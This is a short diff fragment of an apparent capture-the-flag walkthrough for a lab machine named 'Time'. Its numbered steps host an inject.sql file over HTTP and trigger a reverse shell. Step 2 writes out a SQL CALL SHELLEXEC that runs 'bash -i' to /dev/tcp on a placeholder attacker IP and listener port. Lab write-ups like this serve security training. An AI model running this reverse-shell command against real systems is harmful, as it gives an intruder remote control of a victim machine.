Y4h1a/Y4h1a/_dropdown/Time.md

 2. Get ready your bash shell execution for the reverse shell [(CALL SHELLEXEC('bash -i &>/dev/tcp/YOUR_MACHINE_IP/YOUR_NC_LISTNER_PORT 0>&1 &'))].
 3. Fired up your http server for port 8000 to upload inject.sql for our attacking box (Time).
 4. Make your listner ready for the reverse shell.
-5. Use the POC payload with YOUR_MACHINE_IP on port 8000.
+5. Use the POC payload with YOUR_MACHINE_IP on port 8000 in Validate (Beta!).
 6. BOOOM, you got reverse shell.

 **inject.sql**